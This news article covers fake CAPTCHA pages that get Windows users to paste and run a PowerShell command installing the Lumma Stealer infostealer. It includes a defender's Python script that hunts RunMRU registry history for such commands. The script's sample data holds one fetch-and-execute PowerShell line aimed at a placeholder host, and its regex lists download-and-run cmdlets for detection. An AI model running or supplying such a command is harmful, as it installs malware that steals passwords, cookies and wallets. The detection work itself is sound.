
This CAPTCHA Test Can Trick Windows Users Into Installing Malware

Hackers have been spotted circulating a fake CAPTCHA test that looks benign, but can actually manipulate Windows users into installing an infostealing malware.

Michael Kan, Principal Reporter

(Hacker's phishing page/PCMag)

CAPTCHA tests are often routine and boring, which can cause you to turn off your brain and mindlessly click through them. But that inattention is precisely what one group of hackers is trying to exploit. 

In recent weeks, security researchers have spotted hackers circulating a fake CAPTCHA test that can actually install malware on a Windows PC if you follow all the instructions on the screen.

A CAPTCHA test is designed to filter out bots by requiring visitors to a website to prove that they’re human. To do so, the tests often ask you to select the correct objects in an image or to type in a word.

The malicious CAPTCHA test takes the same approach, but asks the user to go to their keyboard, and perform some commands. The instructions may look benign and simple, but in reality the CAPTCHA test is asking the Windows user to install the Lumma Stealer malware, which can loot passwords, cookies and cryptocurrency wallet details from the user’s PC.

(Unit 42)

Specifically, the malicious CAPTCHA test asks the unsuspecting user to press “Windows + R,” which opens the Run dialog box, a way to launch programs. The test then asks the user to press “CTRL + V” and then Enter. If the user does this quickly, they might not realize that the CAPTCHA has actually caused them to paste a PowerShell script into the Run dialog box and then execute it.

It turns out the PowerShell script retrieves a “Windows EXE for Lumma Stealer malware,” according to security researchers at Palo Alto Networks’ Unit 42, which first warned about the fake CAPTCHA tests last month.
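One place the Run-dialog step leaves a trace on the victim's machine is the RunMRU registry key, which records what was typed or pasted into Win+R. The script below is an added defender's example, not code from the article or from Unit 42, Hudson Rock or Huntress: it parses a `reg export` of that key and flags entries that look like a pasted download-and-execute one-liner. The sample export and the indicator list are constructed assumptions.

```python
r"""Hunt the Run-dialog history for a pasted fake-CAPTCHA payload.

Windows stores everything typed or pasted into the Win+R dialog under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a
`reg export` of that key is a cheap first check after a suspected click.
The export below is a constructed sample, not data from the article.
"""
import re

# Switches and cmdlets a one-liner needs to silently fetch and run a payload.
SUSPICIOUS = re.compile(
    r"\b(?:powershell|pwsh|mshta|iex|iwr|invoke-expression|invoke-webrequest|"
    r"downloadstring|downloadfile)\b|-enc\w*|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# One value line of the export, e.g.  "a"="notepad\\1"  (Run appends "\1").
RUNMRU_LINE = re.compile(r'^"(?P<slot>[a-z])"="(?P<cmd>.*?)\\\\1"\s*$', re.M)
MRU_ORDER = re.compile(r'^"MRUList"="(?P<order>[a-z]*)"', re.M)

# Constructed sample of `reg export HKCU\...\RunMRU runmru.reg` (one slot is bad).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr http://example.invalid/x | iex\"\\1"
"c"="C:\\Tools\\procexp.exe\\1"
"MRUList"="bca"
'''


def run_history(reg_export: str) -> list[str]:
    """Return the Run-dialog commands in the export, most recent first."""
    def unescape(s: str) -> str:  # .reg files escape " as \" and \ as \\
        return s.replace('\\"', '"').replace("\\\\", "\\")
    slots = {m["slot"]: unescape(m["cmd"]) for m in RUNMRU_LINE.finditer(reg_export)}
    order = MRU_ORDER.search(reg_export)
    keys = order["order"] if order else sorted(slots)  # MRUList is newest first
    return [slots[k] for k in keys if k in slots]


def suspicious_run_history(reg_export: str) -> list[str]:
    """Commands in the Run history that match the paste-and-run pattern."""
    return [cmd for cmd in run_history(reg_export) if SUSPICIOUS.search(cmd)]


if __name__ == "__main__":
    for cmd in suspicious_run_history(SAMPLE_EXPORT):
        print("suspicious Run entry:", cmd)
```

`reg export` writes the file as UTF-16 with a byte-order mark, so open a real export with `encoding="utf-16"` before passing its text in.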

(Unit 42)

The cybersecurity firm Hudson Rock adds that the hackers are triggering internet browsers to copy the PowerShell script upon visiting malicious web pages hosting the fake CAPTCHA test. “By inspecting the source, we found a JavaScript snippet. This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard,” Hudson Rock’s report says. 

The fake CAPTCHA tests also continue to show up, according to security researcher John Hammond at Huntress, which spotted the attack technique again earlier this week. 

The malicious CAPTCHA tests could also be easily circulated to targets by sending them phishing emails or messages. So users should be on guard if they encounter any unusual requests from a CAPTCHA test that comes their way; it could be a trap.
